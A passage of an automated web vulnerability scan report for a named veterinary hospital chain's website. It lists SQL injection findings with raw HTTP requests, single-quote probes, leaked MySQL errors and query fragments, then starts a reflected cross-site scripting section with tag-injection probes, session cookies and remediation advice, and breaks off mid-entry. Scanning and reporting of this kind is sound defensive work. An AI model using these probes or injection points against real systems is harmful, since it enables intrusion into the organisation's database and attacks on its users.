The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /marshfield' /appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Referer: http://www.vcahospitals.com/marshfield Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:47:33 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2250 Content-Type: text/html select ims_HospitalAddress.*, ims_HospitalCustomService.*, ims_HospitalFax.*, ims_HospitalOtherContact.*, ims_HospitalCustomService.*, ...[SNIP]... left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id where ims_Hospital.i_short_name='marshfield'' limit 1You have an error in your SQL syntax ; check the manual that corresponds to your MySQL server version for the right syntax to use near ''marshfield'' limit 1' at line 31
Request 2
GET /marshfield'' /appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Referer: http://www.vcahospitals.com/marshfield Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665
Response 2
HTTP/1.1 302 Found Date: Sat, 05 Mar 2011 12:47:34 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 Not Found Location: http://www.vcahospitals.com Content-Type: text/html Content-Length: 20166 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]...
1.16. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /new-york-veterinary-hospital' /appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:46:39 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2286 Content-Type: text/html select ims_HospitalAddress.*, ims_HospitalCustomService.*, ims_HospitalFax.*, ims_HospitalOtherContact.*, ims_HospitalCustomService.*, ...[SNIP]... n ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id where ims_Hospital.i_short_name='new-york-veterinary-hospital'' limit 1You have an error in your SQL syntax ; check the manual that corresponds to your MySQL server version for the right syntax to use near ''new-york-veterinary-hospital'' limit 1' at line 31
Request 2
GET /new-york-veterinary-hospital'' /appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665
Response 2
HTTP/1.1 302 Found Date: Sat, 05 Mar 2011 12:46:41 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 Not Found Location: http://www.vcahospitals.com Content-Type: text/html Content-Length: 20613 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]...
1.17. http://www.vcahospitals.com/plymouth [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /plymouth
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /plymouth' HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:47:03 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2246 Content-Type: text/html select ims_HospitalAddress.*, ims_HospitalCustomService.*, ims_HospitalFax.*, ims_HospitalOtherContact.*, ims_HospitalCustomService.*, ...[SNIP]... left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id where ims_Hospital.i_short_name='plymouth'' limit 1You have an error in your SQL syntax ; check the manual that corresponds to your MySQL server version for the right syntax to use near ''plymouth'' limit 1' at line 31
Request 2
GET /plymouth'' HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665
Response 2
HTTP/1.1 302 Found Date: Sat, 05 Mar 2011 12:47:05 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 Not Found Location: http://www.vcahospitals.com Content-Type: text/html Content-Length: 9647 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte...[SNIP]...
1.18. http://www.vcahospitals.com/plymouth/appt.html [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /plymouth/appt.html
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /plymouth' /appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:47:18 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2246 Content-Type: text/html select ims_HospitalAddress.*, ims_HospitalCustomService.*, ims_HospitalFax.*, ims_HospitalOtherContact.*, ims_HospitalCustomService.*, ...[SNIP]... left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id where ims_Hospital.i_short_name='plymouth'' limit 1You have an error in your SQL syntax ; check the manual that corresponds to your MySQL server version for the right syntax to use near ''plymouth'' limit 1' at line 31
Request 2
GET /plymouth'' /appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665
Response 2
HTTP/1.1 302 Found Date: Sat, 05 Mar 2011 12:47:19 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 Not Found Location: http://www.vcahospitals.com Content-Type: text/html Content-Length: 20072 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]...
1.19. http://www.vcahospitals.com/plymouth/more/boarding.html [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /plymouth/more/boarding.html
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /plymouth' /more/boarding.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Referer: http://www.vcahospitals.com/plymouth/appt.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.22.10.1299326665
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:47:34 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2246 Content-Type: text/html select ims_HospitalAddress.*, ims_HospitalCustomService.*, ims_HospitalFax.*, ims_HospitalOtherContact.*, ims_HospitalCustomService.*, ...[SNIP]... left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id where ims_Hospital.i_short_name='plymouth'' limit 1You have an error in your SQL syntax ; check the manual that corresponds to your MySQL server version for the right syntax to use near ''plymouth'' limit 1' at line 31
Request 2
GET /plymouth'' /more/boarding.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Referer: http://www.vcahospitals.com/plymouth/appt.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.22.10.1299326665
Response 2
HTTP/1.1 302 Found Date: Sat, 05 Mar 2011 12:47:36 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 Not Found Location: http://www.vcahospitals.com Content-Length: 7909 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]...
1.20. http://www.vcahospitals.com/tools/markers_sema.php [sema parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /tools/markers_sema.php
Issue detail
The sema parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sema parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /tools/markers_sema.php?sema=E13' HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Referer: http://www.vcahospitals.com/main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw X-Requested-With: XMLHttpRequest Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5mvavkll88lopmn51r8r0kids0; __utmz=107294085.1299326665.1.1.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.1.10.1299326665
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:04:12 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Content-Length: 198 Content-Type: text/htmlYou have an error in your SQL syntax ; check the manual that corresponds to your MySQL server version for the right syntax to use near ''E13'' AND i_emergency_only <> 1 ORDER BY distance' at line 24
Request 2
GET /tools/markers_sema.php?sema=E13'' HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Referer: http://www.vcahospitals.com/main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw X-Requested-With: XMLHttpRequest Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5mvavkll88lopmn51r8r0kids0; __utmz=107294085.1299326665.1.1.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.1.10.1299326665
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:04:13 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Content-Length: 65 Content-Type: text/xml <?xml version="1.0" encoding="ISO-8859-1"?> <markers> </markers>
2. Cross-site scripting (reflected)
There are 138 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
2.1. http://www.vcahospitals.com/becker/markers.php [REST URL parameter 2]
Summary
Severity: High
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /becker/markers.php
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dfec"><a>30055149e9d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /becker/markers.php6dfec"><a>30055149e9d ?lat=40.7388648&lng=-73.9831733&ffe HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Referer: http://www.vcahospitals.com/main/directory.html?utm_content=link.corp.ffe.locator. X-Requested-With: XMLHttpRequest Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Mar 2011 12:48:18 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 Not Found Content-Type: text/html Content-Length: 9744 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <body id="markers6dfec"><a>30055149e9d ">...[SNIP]...
2.2. http://www.vcahospitals.com/hanson/appt.html [REST URL parameter 2]
Summary
Severity: High
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /hanson/appt.html
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54666"><a>31d8f105f44 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /hanson/appt.html54666"><a>31d8f105f44 HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Referer: http://www.vcahospitals.com/hanson Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Mar 2011 12:47:38 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 Not Found Content-Type: text/html Content-Length: 9009 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <body id="appt54666"><a>31d8f105f44 ">...[SNIP]...
2.3. http://www.vcahospitals.com/hanson/appt.html [altphone parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /hanson/appt.html
Issue detail
